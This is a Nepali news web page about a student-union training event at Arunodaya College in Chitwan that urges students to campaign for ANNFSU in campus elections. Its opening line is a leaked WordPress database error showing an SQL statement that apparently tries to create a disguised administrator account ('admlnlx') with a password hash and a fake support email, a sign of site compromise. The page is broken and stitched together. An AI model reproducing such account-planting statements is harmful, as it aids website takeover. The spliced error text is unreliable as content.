WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BRj4D.GwtrznwfKXaW5SciDd6tpXrY0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-05 01:39:05', '', 'admlnlx', 'admlnlx')
चितवन, माघ २३–
स्वतन्त्र विद्यार्थी युनियनलाई लक्षित गरि अनेरास्ववियु क्याम्पस कमिटि अरुणोदय कलेज गीतानगरको आयोजनामा प्रशिक्षण तथा चियापान कार्यक्रम भएको छ ।
आज क्याम्पस परिसरमा भएको कार्यक्रममा विद्यार्थीहरुको उत्साहजनक सहभागिता रहेको थियो । कार्यक्रममा प्रमुख अतिथि अनेरास्ववियु चितवनका अध्यक्ष देवप्रसाद पाठक, एमाले जिल्ला सचिवालय सदस्य एवंम युवा इन्चार्ज प्रकाश ढुङगाना र अनेरास्ववियु जिल्ला सचिव प्रकाश आचार्यले विद्यार्थीहरुलाई प्रशिक्षण दिएका थिए ।
कार्यक्रममा अनेरास्ववियु जिल्ला अध्यक्ष पाठकले अनेरास्ववियुले उठाएको मुद्धालाई व्यापाक प्रचार–प्रसार गरि स्ववियु निर्वाचनमा अनेरास्ववियुलार्य जिताउने अभियानमा लाग्न निर्देशन दिनुभयो । कार्यक्रममा एमाले जिल्ला सचिवालय सदस्य ढुङगानाले क्याम्पसमा अनेरास्ववियुलाई जिताउन सबै विद्यार्थीहरुलाई अहिलेदेखि व्यापक तयारी थाल्न आग्रह गर्नुभयो ।
अनेरास्ववियु जिल्ला सचिव आचार्यले सबै विद्यार्थीहरु एकजुट अभियान निर्वाचन अभियानमा होमिन निर्देशन दिनुभयो । उहाँले आवश्यक सल्लाह, सुझाव र सहयोग गर्न जिल्ला समिति तयार रहेको भन्दै दिलोज्यान दिएर निर्वाचनमा खट्न निर्देशन दिनुभयो । कार्यक्रम अनेरास्ववियु अरुणोदय इकाई अध्यक्ष रवि सुवेदीको अध्यक्षतामा सम्पन्न भएको थियो ।